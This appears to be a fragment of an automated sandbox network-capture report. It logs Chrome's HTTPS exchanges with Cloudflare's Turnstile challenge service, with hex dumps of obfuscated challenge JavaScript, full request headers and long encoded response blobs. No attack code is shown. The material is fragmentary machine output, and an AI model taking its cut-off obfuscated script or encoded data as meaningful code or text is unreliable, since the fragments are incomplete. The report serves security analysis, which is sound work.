                                                                                                                                                                                                                                                                                      Data Ascii: cI':function(h,i){return h(i)},'FbuUQ':function(h,i){return i&h},'vSRcN':function(h,i){return h(i)},'beHuz':function(h,i){return h*i},'rkjtW':function(h,i){return h-i},'IUDIv':function(h,i){return h&i},'OlinN':function(h,i){return h-i},'Vpciy':function(h,
                                                                                                                                                                                                                                                                                      2024-10-24 22:05:50 UTC1369INData Raw: 36 31 37 29 5d 28 32 2c 46 29 2c 46 2b 2b 29 2c 64 65 6c 65 74 65 20 42 5b 43 5d 7d 65 6c 73 65 20 66 6f 72 28 4d 3d 78 5b 43 5d 2c 73 3d 30 3b 73 3c 46 3b 48 3d 64 5b 67 50 28 37 37 38 29 5d 28 48 2c 31 29 7c 64 5b 67 50 28 31 31 32 32 29 5d 28 4d 2c 31 29 2c 6a 2d 31 3d 3d 49 3f 28 49 3d 30 2c 47 5b 67 50 28 31 32 37 35 29 5d 28 6f 28 48 29 29 2c 48 3d 30 29 3a 49 2b 2b 2c 4d 3e 3e 3d 31 2c 73 2b 2b 29 3b 43 3d 28 44 2d 2d 2c 30 3d 3d 44 26 26 28 44 3d 4d 61 74 68 5b 67 50 28 31 36 31 37 29 5d 28 32 2c 46 29 2c 46 2b 2b 29 2c 78 5b 4c 5d 3d 45 2b 2b 2c 64 5b 67 50 28 31 33 35 30 29 5d 28 53 74 72 69 6e 67 2c 4b 29 29 7d 69 66 28 64 5b 67 50 28 31 34 31 32 29 5d 28 27 27 2c 43 29 29 7b 69 66 28 4f 62 6a 65 63 74 5b 67 50 28 31 35 34 30 29 5d 5b 67 50 28
                                                                                                                                                                                                                                                                                      Data Ascii: 617)](2,F),F++),delete B[C]}else for(M=x[C],s=0;s<F;H=d[gP(778)](H,1)|d[gP(1122)](M,1),j-1==I?(I=0,G[gP(1275)](o(H)),H=0):I++,M>>=1,s++);C=(D--,0==D&&(D=Math[gP(1617)](2,F),F++),x[L]=E++,d[gP(1350)](String,K))}if(d[gP(1412)]('',C)){if(Object[gP(1540)][gP(
                                                                                                                                                                                                                                                                                      2024-10-24 22:05:50 UTC1369INData Raw: 61 6b 7d 65 6c 73 65 20 49 2b 2b 3b 72 65 74 75 72 6e 20 47 5b 67 50 28 31 33 36 38 29 5d 28 27 27 29 7d 65 6c 73 65 20 4d 5b 67 50 28 31 36 31 34 29 5d 5b 67 50 28 37 35 33 29 5d 3d 30 7d 2c 27 6a 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 67 53 2c 69 2c 6b 2c 6c 29 7b 69 66 28 67 53 3d 67 4d 2c 69 3d 7b 27 77 58 49 68 58 27 3a 66 75 6e 63 74 69 6f 6e 28 6a 2c 6b 2c 67 51 29 7b 72 65 74 75 72 6e 20 67 51 3d 62 2c 64 5b 67 51 28 31 34 33 35 29 5d 28 6a 2c 6b 29 7d 2c 27 51 4d 75 66 66 27 3a 66 75 6e 63 74 69 6f 6e 28 6a 2c 6b 29 7b 72 65 74 75 72 6e 20 6a 2d 6b 7d 2c 27 79 70 75 45 71 27 3a 66 75 6e 63 74 69 6f 6e 28 6a 2c 6b 29 7b 72 65 74 75 72 6e 20 6a 5e 6b 7d 2c 27 7a 6c 74 52 65 27 3a 66 75 6e 63 74 69 6f 6e 28 6a 2c 6b 29 7b 72 65 74 75 72 6e 20 6a 2b
                                                                                                                                                                                                                                                                                      Data Ascii: ak}else I++;return G[gP(1368)]('')}else M[gP(1614)][gP(753)]=0},'j':function(h,gS,i,k,l){if(gS=gM,i={'wXIhX':function(j,k,gQ){return gQ=b,d[gQ(1435)](j,k)},'QMuff':function(j,k){return j-k},'ypuEq':function(j,k){return j^k},'zltRe':function(j,k){return j+
                                                                                                                                                                                                                                                                                      2024-10-24 22:05:50 UTC1369INData Raw: 30 29 5d 2c 64 5b 67 55 28 39 39 32 29 5d 29 3f 28 4f 3d 64 5b 67 55 28 37 37 34 29 5d 28 4a 2c 4b 29 2c 4b 3e 3e 3d 31 2c 4b 3d 3d 30 26 26 28 4b 3d 6f 2c 4a 3d 64 5b 67 55 28 31 33 35 30 29 5d 28 73 2c 4c 2b 2b 29 29 2c 4d 7c 3d 64 5b 67 55 28 31 35 33 32 29 5d 28 64 5b 67 55 28 35 32 32 29 5d 28 30 2c 4f 29 3f 31 3a 30 2c 49 29 2c 49 3c 3c 3d 31 29 3a 50 5b 67 55 28 31 30 38 35 29 5d 5b 67 55 28 31 31 38 36 29 5d 28 42 5b 67 55 28 36 38 33 29 5d 29 29 3b 73 77 69 74 63 68 28 4d 29 7b 63 61 73 65 20 30 3a 66 6f 72 28 4d 3d 30 2c 4e 3d 4d 61 74 68 5b 67 55 28 31 36 31 37 29 5d 28 32 2c 38 29 2c 49 3d 31 3b 64 5b 67 55 28 39 32 35 29 5d 28 49 2c 4e 29 3b 4f 3d 64 5b 67 55 28 37 32 37 29 5d 28 4a 2c 4b 29 2c 4b 3e 3e 3d 31 2c 4b 3d 3d 30 26 26 28 4b 3d 6f
                                                                                                                                                                                                                                                                                      Data Ascii: 0)],d[gU(992)])?(O=d[gU(774)](J,K),K>>=1,K==0&&(K=o,J=d[gU(1350)](s,L++)),M|=d[gU(1532)](d[gU(522)](0,O)?1:0,I),I<<=1):P[gU(1085)][gU(1186)](B[gU(683)]));switch(M){case 0:for(M=0,N=Math[gU(1617)](2,8),I=1;d[gU(925)](I,N);O=d[gU(727)](J,K),K>>=1,K==0&&(K=o
                                                                                                                                                                                                                                                                                      2024-10-24 22:05:50 UTC1369INData Raw: 28 35 34 38 29 3f 65 4e 5b 67 4c 28 31 33 38 36 29 5d 28 67 4c 28 34 30 37 29 2c 66 75 6e 63 74 69 6f 6e 28 29 7b 73 65 74 54 69 6d 65 6f 75 74 28 65 59 2c 30 29 7d 29 3a 73 65 74 54 69 6d 65 6f 75 74 28 65 59 2c 30 29 2c 65 5a 3d 66 75 6e 63 74 69 6f 6e 28 66 2c 68 72 2c 67 2c 68 2c 69 2c 6a 2c 6b 2c 6c 2c 6d 29 7b 66 6f 72 28 68 72 3d 67 4c 2c 67 3d 7b 7d 2c 67 5b 68 72 28 37 33 38 29 5d 3d 66 75 6e 63 74 69 6f 6e 28 6e 2c 73 29 7b 72 65 74 75 72 6e 20 6e 2d 73 7d 2c 67 5b 68 72 28 36 30 31 29 5d 3d 66 75 6e 63 74 69 6f 6e 28 6e 2c 73 29 7b 72 65 74 75 72 6e 20 6e 26 73 7d 2c 68 3d 67 2c 6d 2c 6a 3d 33 32 2c 6c 3d 65 4d 5b 68 72 28 31 36 31 34 29 5d 5b 68 72 28 31 35 36 30 29 5d 2b 27 5f 27 2b 30 2c 6c 3d 6c 5b 68 72 28 36 35 39 29 5d 28 2f 2e 2f 67 2c
                                                                                                                                                                                                                                                                                      Data Ascii: (548)?eN[gL(1386)](gL(407),function(){setTimeout(eY,0)}):setTimeout(eY,0),eZ=function(f,hr,g,h,i,j,k,l,m){for(hr=gL,g={},g[hr(738)]=function(n,s){return n-s},g[hr(601)]=function(n,s){return n&s},h=g,m,j=32,l=eM[hr(1614)][hr(1560)]+'_'+0,l=l[hr(659)](/./g,
                                                                                                                                                                                                                                                                                      2024-10-24 22:05:50 UTC1369INData Raw: 4a 2b 31 2c 31 29 3a 4a 2b 3d 31 29 3b 72 65 74 75 72 6e 20 49 7d 28 43 29 2c 44 3d 27 6e 41 73 41 61 41 62 27 2e 73 70 6c 69 74 28 27 41 27 29 2c 44 3d 44 5b 69 61 28 34 31 32 29 5d 5b 69 61 28 36 31 36 29 5d 28 44 29 2c 45 3d 30 3b 45 3c 43 5b 69 61 28 31 31 33 34 29 5d 3b 46 3d 43 5b 45 5d 2c 47 3d 66 7a 28 68 2c 69 2c 46 29 2c 44 28 47 29 3f 28 48 3d 27 73 27 3d 3d 3d 47 26 26 21 68 5b 69 61 28 31 30 33 39 29 5d 28 69 5b 46 5d 29 2c 69 61 28 31 33 32 30 29 3d 3d 3d 6a 2b 46 3f 42 28 78 5b 69 61 28 36 36 37 29 5d 28 6a 2c 46 29 2c 47 29 3a 48 7c 7c 42 28 78 5b 69 61 28 31 30 30 33 29 5d 28 6a 2c 46 29 2c 69 5b 46 5d 29 29 3a 42 28 78 5b 69 61 28 36 38 32 29 5d 28 6a 2c 46 29 2c 47 29 2c 45 2b 2b 29 3b 72 65 74 75 72 6e 20 6f 3b 66 75 6e 63 74 69 6f 6e
                                                                                                                                                                                                                                                                                      Data Ascii: J+1,1):J+=1);return I}(C),D='nAsAaAb'.split('A'),D=D[ia(412)][ia(616)](D),E=0;E<C[ia(1134)];F=C[E],G=fz(h,i,F),D(G)?(H='s'===G&&!h[ia(1039)](i[F]),ia(1320)===j+F?B(x[ia(667)](j,F),G):H||B(x[ia(1003)](j,F),i[F])):B(x[ia(682)](j,F),G),E++);return o;function
                                                                                                                                                                                                                                                                                      2024-10-24 22:05:50 UTC1369INData Raw: 34 29 5d 2c 27 65 76 65 6e 74 27 3a 69 68 28 31 30 31 30 29 2c 27 63 66 43 68 6c 4f 75 74 27 3a 65 4d 5b 69 68 28 31 36 31 34 29 5d 5b 69 68 28 39 36 37 29 5d 2c 27 63 66 43 68 6c 4f 75 74 53 27 3a 65 4d 5b 69 68 28 31 36 31 34 29 5d 5b 69 68 28 31 35 36 39 29 5d 2c 27 63 6f 64 65 27 3a 65 5b 69 68 28 36 37 34 29 5d 2c 27 72 63 56 27 3a 65 4d 5b 69 68 28 31 36 31 34 29 5d 5b 69 68 28 33 35 35 29 5d 7d 2c 27 2a 27 29 29 29 7d 2c 67 29 7d 2c 65 4d 5b 67 4c 28 32 36 30 29 5d 3d 66 75 6e 63 74 69 6f 6e 28 66 2c 67 2c 68 2c 69 69 2c 69 2c 6a 2c 6b 2c 6c 2c 6d 2c 6e 2c 6f 2c 73 2c 78 2c 42 2c 43 2c 44 2c 46 2c 47 29 7b 69 3d 28 69 69 3d 67 4c 2c 7b 27 46 44 77 71 54 27 3a 66 75 6e 63 74 69 6f 6e 28 45 2c 46 29 7b 72 65 74 75 72 6e 20 45 2b 46 7d 2c 27 77 52 64
                                                                                                                                                                                                                                                                                      Data Ascii: 4)],'event':ih(1010),'cfChlOut':eM[ih(1614)][ih(967)],'cfChlOutS':eM[ih(1614)][ih(1569)],'code':e[ih(674)],'rcV':eM[ih(1614)][ih(355)]},'*')))},g)},eM[gL(260)]=function(f,g,h,ii,i,j,k,l,m,n,o,s,x,B,C,D,F,G){i=(ii=gL,{'FDwqT':function(E,F){return E+F},'wRd


                                                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                      18192.168.2.1649729104.18.95.414436732C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                      2024-10-24 22:05:50 UTC1150OUTPOST /cdn-cgi/challenge-platform/h/b/flow/ov1/1007358488:1729804167:CRDzmKFIoAU4yvrVIjAbfjq9957Nm-UqDmKN-DBsI4o/8d7d45361ad96c58/ToaaVLDWqctN4ec2H.7xI39gx5IJZ550uqUHYZCULGM-1729807547-1.1.1.1-mgtEiPfUVuYisRVn6khwMk8R.3HNdOcjhcYByyKgmlmdNBQnct_G_8GLQIWqf18m HTTP/1.1
                                                                                                                                                                                                                                                                                      Host: challenges.cloudflare.com
                                                                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                                                                      Content-Length: 3076
                                                                                                                                                                                                                                                                                      sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                                      Content-type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                                                      sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                      CF-Challenge: ToaaVLDWqctN4ec2H.7xI39gx5IJZ550uqUHYZCULGM-1729807547-1.1.1.1-mgtEiPfUVuYisRVn6khwMk8R.3HNdOcjhcYByyKgmlmdNBQnct_G_8GLQIWqf18m
                                                                                                                                                                                                                                                                                      sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                                      Accept: */*
                                                                                                                                                                                                                                                                                      Origin: https://challenges.cloudflare.com
                                                                                                                                                                                                                                                                                      Sec-Fetch-Site: same-origin
                                                                                                                                                                                                                                                                                      Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                                                      Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                                      Referer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv0/0/g5awn/0x4AAAAAAAxU5YQo4UeBLOJu/auto/fbE/normal/auto/
                                                                                                                                                                                                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                      2024-10-24 22:05:50 UTC3076OUTData Raw: 76 5f 38 64 37 64 34 35 33 36 31 61 64 39 36 63 35 38 3d 49 4a 56 4e 70 4e 6b 4e 76 4e 6e 4e 79 4e 63 58 66 51 58 6a 66 78 4e 64 65 43 59 36 46 66 4b 66 42 77 4e 51 68 4e 66 4c 56 66 4f 4e 78 59 30 73 66 31 4e 30 65 59 4e 6a 46 78 56 66 46 4e 37 4a 46 30 38 66 49 58 69 66 64 73 47 55 4e 37 49 68 79 6d 36 4e 66 32 6f 47 56 66 63 66 43 68 32 47 66 71 58 36 66 7a 49 6c 56 4b 64 6d 30 66 63 38 2d 53 66 70 69 37 64 66 53 71 56 6c 45 55 43 73 41 75 6f 72 55 55 69 57 68 55 42 37 6c 45 6e 69 66 56 76 75 53 4b 68 4e 32 66 6a 35 66 36 59 4c 73 53 58 75 4f 4e 66 79 56 4f 4a 66 44 36 65 58 42 6a 66 66 65 50 51 4a 35 76 65 66 48 6d 69 66 4a 42 64 76 66 63 4a 66 56 4e 6a 6f 6a 43 51 68 66 64 7a 36 66 56 7a 73 74 46 59 66 55 4f 56 66 7a 4e 66 70 4b 4f 76 36 4e 6b 78 6b
                                                                                                                                                                                                                                                                                      Data Ascii: v_8d7d45361ad96c58=IJVNpNkNvNnNyNcXfQXjfxNdeCY6FfKfBwNQhNfLVfONxY0sf1N0eYNjFxVfFN7JF08fIXifdsGUN7Ihym6Nf2oGVfcfCh2GfqX6fzIlVKdm0fc8-Sfpi7dfSqVlEUCsAuorUUiWhUB7lEnifVvuSKhN2fj5f6YLsSXuONfyVOJfD6eXBjffePQJ5vefHmifJBdvfcJfVNjojCQhfdz6fVzstFYfUOVfzNfpKOv6Nkxk
                                                                                                                                                                                                                                                                                      2024-10-24 22:05:50 UTC747INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                      Date: Thu, 24 Oct 2024 22:05:50 GMT
                                                                                                                                                                                                                                                                                      Content-Type: text/plain; charset=UTF-8
                                                                                                                                                                                                                                                                                      Content-Length: 149608
                                                                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                                                                      cf-chl-gen: heHhgwgsf52BGJmP2TNmECx/Ht1D24YMLZ4cKOsOULlnpeLxtpVAF2lnZ13+8NShVkG3qPLwkMtMhW0YX33d81pbdg11XmDNiGI5jaaLR3nicFPfnW/sI3P2BuZeoKVyqOnis/8s9filNDKJ/PgxHCtOKg8rU6gXEzBbX9WlHkkp9pLqcaS00OaB1Z5W9PHiXbjNlYZJYKV+DN78k4LgnMlmz0NxXXO9/qXTfaQvnGHg+CiKh9uhQ+p/DSnLo8mkHfxaA83RD3z4Fsrwgd4pwK75x9/JmT+QyfqbYHj4ROv8jZk7GbJcyKitFE+isGx6a5N9UgCrIN4C9WfhniECmQz4AegUaTGAT7ebS2H3X+B8Hr/Jp/wESsiRIcFN3wZUsnCYZkUHr/mA1OVdrGZm5kLJQD2blwG4DBrDw9C/sbTIIwVSIRiCcPWro/uCb2CFqHa/nX69zZk+jfsx7JBzWJmlTkuFwvXrrD3Y0Hd9h8HMNbs=$iDLKLx3F9bRt5hfI
                                                                                                                                                                                                                                                                                      Server: cloudflare
                                                                                                                                                                                                                                                                                      CF-RAY: 8d7d4545a95ce9a0-DFW
                                                                                                                                                                                                                                                                                      alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                                                      2024-10-24 22:05:50 UTC622INData Raw: 69 59 64 4c 59 57 4a 64 57 59 52 78 54 49 56 30 6c 33 39 4b 62 6e 42 6f 62 58 5a 33 56 32 68 63 6f 57 39 34 67 32 39 36 70 4b 65 71 61 34 4e 34 65 4b 46 6e 6e 49 71 65 74 4b 57 7a 69 6d 36 4e 64 36 79 50 6e 49 61 49 77 49 71 68 6f 62 4f 33 68 59 58 45 75 72 57 37 6f 61 53 6f 6d 61 4b 6d 69 61 62 49 76 63 4b 4f 6c 4c 47 78 75 4b 79 64 75 74 48 4c 74 37 71 69 32 4f 4b 65 78 72 6d 7a 75 39 76 6e 74 37 2f 67 76 4b 6e 4b 35 4d 54 57 78 64 69 7a 77 72 62 47 35 4e 44 6d 7a 4f 48 78 37 2f 58 75 33 4f 37 58 39 4d 44 4b 34 66 30 46 79 75 55 43 42 39 41 4c 45 39 4d 47 30 67 49 51 47 51 72 79 48 67 7a 74 38 68 4d 5a 46 77 62 31 33 76 55 48 39 79 4d 44 2b 79 4c 72 48 51 77 7a 37 6a 48 79 4c 76 50 70 46 69 55 48 42 52 34 48 42 78 6b 4b 46 69 76 39 41 68 6f 33 49 76 6f
                                                                                                                                                                                                                                                                                      Data Ascii: iYdLYWJdWYRxTIV0l39KbnBobXZ3V2hcoW94g296pKeqa4N4eKFnnIqetKWzim6Nd6yPnIaIwIqhobO3hYXEurW7oaSomaKmiabIvcKOlLGxuKydutHLt7qi2OKexrmzu9vnt7/gvKnK5MTWxdizwrbG5NDmzOHx7/Xu3O7X9MDK4f0FyuUCB9ALE9MG0gIQGQryHgzt8hMZFwb13vUH9yMD+yLrHQwz7jHyLvPpFiUHBR4HBxkKFiv9Aho3Ivo
                                                                                                                                                                                                                                                                                      2024-10-24 22:05:50 UTC1369INData Raw: 39 67 58 78 38 76 5a 45 42 68 5a 45 4a 45 4e 6a 70 54 49 6b 45 38 4b 47 30 78 50 47 4a 78 58 30 6c 43 62 54 6c 4c 54 45 70 4c 61 58 6f 39 51 58 5a 59 64 55 31 34 67 56 65 42 69 6e 4e 62 56 55 35 2b 65 47 42 63 52 58 4a 39 6b 35 46 55 62 59 36 52 66 49 39 38 61 48 42 7a 57 35 31 38 6e 4b 4b 54 65 57 65 6b 6d 32 56 31 6c 6f 61 4c 63 59 65 55 68 35 53 4d 75 49 4b 51 62 4b 53 59 63 33 6d 33 6b 59 36 79 6c 73 4f 45 78 4a 44 45 6c 38 54 42 77 36 50 43 76 4d 43 52 6a 4c 37 46 6b 64 4b 2f 6f 38 37 56 32 5a 76 4b 31 4d 76 41 73 4c 50 4f 77 35 37 63 74 37 62 69 78 71 53 30 74 61 72 61 73 4e 76 43 34 75 76 79 31 71 2f 73 30 66 50 63 35 75 36 37 31 4c 61 2f 31 4e 7a 4d 31 2b 37 36 33 50 34 45 33 4f 50 62 79 73 2f 61 2b 65 58 63 38 41 6e 33 39 42 62 4c 45 74 66 6b 35
                                                                                                                                                                                                                                                                                      Data Ascii: 9gXx8vZEBhZEJENjpTIkE8KG0xPGJxX0lCbTlLTEpLaXo9QXZYdU14gVeBinNbVU5+eGBcRXJ9k5FUbY6RfI98aHBzW518nKKTeWekm2V1loaLcYeUh5SMuIKQbKSYc3m3kY6ylsOExJDEl8TBw6PCvMCRjL7FkdK/o87V2ZvK1MvAsLPOw57ct7bixqS0tarasNvC4uvy1q/s0fPc5u671La/1NzM1+763P4E3OPbys/a+eXc8An39BbLEtfk5
                                                                                                                                                                                                                                                                                      2024-10-24 22:05:50 UTC1369INData Raw: 38 51 6b 4d 68 56 32 4a 71 4b 55 42 65 4b 53 78 42 55 48 52 69 5a 48 56 73 4b 6b 6c 6b 61 48 70 4b 57 31 35 6f 56 6f 4e 61 62 6c 74 64 56 6c 5a 62 67 30 46 73 59 6f 46 58 57 6b 6c 51 66 33 32 43 63 6c 56 68 63 6e 42 6e 65 35 53 4e 62 6c 70 61 6e 58 56 66 58 6f 36 61 6c 61 64 32 67 34 42 72 69 59 4b 52 59 35 78 6c 62 32 36 4a 72 70 47 7a 64 4b 32 56 70 34 61 57 6b 36 71 5a 77 35 36 68 6e 72 48 45 79 59 47 33 6e 70 69 66 6e 4d 53 65 71 49 6d 73 30 4a 36 34 71 4a 54 50 75 39 53 61 6b 4e 76 56 30 63 36 6a 74 4e 75 63 33 4c 48 71 79 4c 58 62 7a 63 2b 6e 34 50 48 4d 7a 75 72 31 39 66 44 4f 71 39 58 45 73 75 33 2b 37 66 66 69 39 50 33 73 78 51 54 46 32 64 72 63 35 50 6a 48 7a 76 7a 72 7a 76 7a 62 45 66 30 50 36 50 44 6d 37 2b 66 33 2b 52 4c 36 38 2f 37 72 38 77
                                                                                                                                                                                                                                                                                      Data Ascii: 8QkMhV2JqKUBeKSxBUHRiZHVsKklkaHpKW15oVoNabltdVlZbg0FsYoFXWklQf32CclVhcnBne5SNblpanXVfXo6alad2g4BriYKRY5xlb26JrpGzdK2Vp4aWk6qZw56hnrHEyYG3npifnMSeqIms0J64qJTPu9SakNvV0c6jtNuc3LHqyLXbzc+n4PHMzur19fDOq9XEsu3+7ffi9P3sxQTF2drc5PjHzvzrzvzbEf0P6PDm7+f3+RL68/7r8w
                                                                                                                                                                                                                                                                                      2024-10-24 22:05:50 UTC1369INData Raw: 52 47 63 73 57 69 64 6a 50 32 34 76 61 6a 34 33 4e 32 31 33 56 55 52 62 66 33 6c 35 67 57 78 4d 64 55 42 55 51 48 31 56 56 47 4a 2f 6a 6d 4f 50 6a 45 68 50 61 49 75 56 69 33 64 75 56 35 70 32 6c 5a 31 55 62 59 69 69 6b 35 71 51 6f 59 47 41 63 35 70 37 67 49 79 59 71 61 74 2b 72 6e 36 46 6f 61 65 78 71 36 57 74 75 34 2b 47 6c 49 71 50 65 4c 32 42 6e 34 2b 79 6b 38 53 58 70 4c 2b 64 75 6e 2f 50 6d 4a 6e 42 72 4d 6e 4d 31 70 58 44 6f 4a 47 6d 6c 4c 6e 64 73 73 32 65 74 63 48 5a 6c 71 36 65 73 63 6e 6a 34 63 44 61 77 65 57 75 76 4e 75 77 31 4d 62 42 31 64 62 77 7a 4f 50 4a 2b 64 4c 4e 2f 64 58 30 34 38 48 4e 39 38 2f 46 32 77 4c 66 43 2b 6b 4c 2b 2b 66 4f 43 2b 54 6a 33 65 77 56 35 42 67 4d 42 67 6e 79 37 52 77 61 2f 76 37 33 37 39 76 36 49 65 59 6f 32 77 45
                                                                                                                                                                                                                                                                                      Data Ascii: RGcsWidjP24vaj43N213VURbf3l5gWxMdUBUQH1VVGJ/jmOPjEhPaIuVi3duV5p2lZ1UbYiik5qQoYGAc5p7gIyYqat+rn6Foaexq6Wtu4+GlIqPeL2Bn4+yk8SXpL+dun/PmJnBrMnM1pXDoJGmlLndss2etcHZlq6escnj4cDaweWuvNuw1MbB1dbwzOPJ+dLN/dX048HN98/F2wLfC+kL++fOC+Tj3ewV5BgMBgny7Rwa/v7379v6IeYo2wE
                                                                                                                                                                                                                                                                                      2024-10-24 22:05:50 UTC1369INData Raw: 45 78 6a 4a 79 39 7a 52 6d 31 45 52 69 34 37 4f 33 68 79 57 34 46 63 58 6d 4a 58 58 32 43 4a 53 55 4e 35 51 32 46 6e 6b 55 32 4a 54 6e 42 78 61 33 46 72 6a 47 4a 62 65 49 35 57 65 58 6c 59 58 6d 35 7a 67 58 39 35 65 59 4f 53 68 6d 57 48 64 71 69 44 71 6d 71 44 6c 4b 4f 45 6c 49 57 77 6d 57 32 30 74 72 47 53 6e 37 31 36 65 73 57 74 6a 35 7a 4a 6f 5a 75 49 78 36 53 70 76 37 36 76 71 5a 7a 52 6b 6f 2b 75 71 73 75 61 71 72 6d 70 6d 71 79 30 76 61 76 45 72 71 4c 4f 6d 65 47 35 79 71 48 4a 79 63 62 64 78 2b 50 74 76 38 36 73 7a 72 50 51 78 74 62 30 32 4f 37 2b 76 50 79 7a 2b 62 6b 41 41 65 58 45 31 64 30 44 2b 64 66 6b 7a 4f 54 6d 34 4f 58 73 37 66 4d 41 43 77 49 4c 45 65 77 4a 48 74 76 66 2b 66 62 61 2b 78 72 2b 33 77 4c 79 47 67 55 65 4a 79 58 37 4d 53 67 6f
                                                                                                                                                                                                                                                                                      Data Ascii: ExjJy9zRm1ERi47O3hyW4FcXmJXX2CJSUN5Q2FnkU2JTnBxa3FrjGJbeI5WeXlYXm5zgX95eYOShmWHdqiDqmqDlKOElIWwmW20trGSn716esWtj5zJoZuIx6Spv76vqZzRko+uqsuaqrmpmqy0vavErqLOmeG5yqHJycbdx+Ptv86szrPQxtb02O7+vPyz+bkAAeXE1d0D+dfkzOTm4OXs7fMACwILEewJHtvf+fba+xr+3wLyGgUeJyX7MSgo
                                                                                                                                                                                                                                                                                      2024-10-24 22:05:50 UTC1369INData Raw: 6c 4b 62 6b 31 47 56 48 46 32 62 33 47 45 66 56 53 41 68 46 71 43 61 45 56 62 57 6b 56 70 62 6f 4e 75 54 6d 4a 74 64 58 4b 4f 6b 35 71 4a 6e 49 6d 48 6c 5a 36 51 6c 34 39 74 6c 56 2b 43 67 48 47 41 66 48 74 2b 62 61 75 63 65 36 36 64 67 59 65 67 6e 36 71 4b 6b 58 47 31 6b 33 36 78 6d 70 69 2b 6c 4a 57 51 73 6e 6d 6c 78 34 61 30 68 63 37 50 6d 37 6a 4c 75 6f 36 52 30 38 76 4c 71 62 47 54 70 4d 36 75 30 4a 61 36 6b 39 58 59 34 64 6e 46 31 39 44 54 6f 73 44 4e 77 62 75 33 34 61 2b 36 39 4e 37 77 79 38 33 70 34 61 7a 6b 31 76 58 6d 33 39 41 42 75 4f 75 2f 7a 63 44 39 34 4d 58 48 42 4f 6e 6a 2b 4e 33 6c 33 2f 4d 52 2f 4f 54 6a 42 41 45 52 36 39 58 39 46 77 6e 71 41 42 59 61 41 50 30 4f 48 76 45 49 41 2f 6b 72 43 51 30 6a 42 67 38 6e 4a 76 45 6f 42 75 67 47 4a
                                                                                                                                                                                                                                                                                      Data Ascii: lKbk1GVHF2b3GEfVSAhFqCaEVbWkVpboNuTmJtdXKOk5qJnImHlZ6Ql49tlV+CgHGAfHt+bauce66dgYegn6qKkXG1k36xmpi+lJWQsnmlx4a0hc7Pm7jLuo6R08vLqbGTpM6u0Ja6k9XY4dnF19DTosDNwbu34a+69N7wy83p4azk1vXm39ABuOu/zcD94MXHBOnj+N3l3/MR/OTjBAER69X9FwnqABYaAP0OHvEIA/krCQ0jBg8nJvEoBugGJ
                                                                                                                                                                                                                                                                                      2024-10-24 22:05:50 UTC1369INData Raw: 61 54 32 30 31 59 30 4f 44 66 6c 46 67 58 6d 68 58 6a 6e 78 42 65 31 6c 39 61 30 31 68 69 6f 56 7a 6b 6d 6c 78 63 70 61 5a 6d 6e 53 52 6f 56 78 67 66 70 32 42 6c 6f 64 30 61 6d 69 62 68 57 5a 38 70 62 43 77 71 59 32 6b 64 62 61 73 74 62 4e 79 64 33 53 74 6e 70 57 41 71 34 4b 58 66 4b 53 6b 78 4c 32 6b 79 61 36 6f 75 71 53 67 68 4d 61 6b 31 61 61 67 77 36 48 45 72 72 66 4f 6e 4d 65 62 6b 38 2f 54 6f 4e 79 76 70 63 62 6a 74 61 69 30 6f 2b 79 38 76 4f 37 62 33 36 2f 30 78 75 6a 56 75 63 79 30 7a 4d 76 36 30 66 72 4a 30 66 4f 2f 32 2f 4d 43 79 4f 48 47 35 66 54 38 35 50 72 6d 41 39 37 76 46 4e 4d 55 37 63 2f 72 46 50 45 64 43 41 38 4c 49 68 33 39 2b 69 45 43 39 75 54 67 4b 50 4c 69 4b 65 50 6b 42 43 6f 61 4c 50 45 66 43 43 4d 59 4d 44 6b 52 38 6a 55 38 38 42
                                                                                                                                                                                                                                                                                      Data Ascii: aT201Y0ODflFgXmhXjnxBe1l9a01hioVzkmlxcpaZmnSRoVxgfp2Blod0amibhWZ8pbCwqY2kdbastbNyd3StnpWAq4KXfKSkxL2kya6ouqSghMak1aagw6HErrfOnMebk8/ToNyvpcbjtai0o+y8vO7b36/0xujVucy0zMv60frJ0fO/2/MCyOHG5fT85PrmA97vFNMU7c/rFPEdCA8LIh39+iEC9uTgKPLiKePkBCoaLPEfCCMYMDkR8jU88B
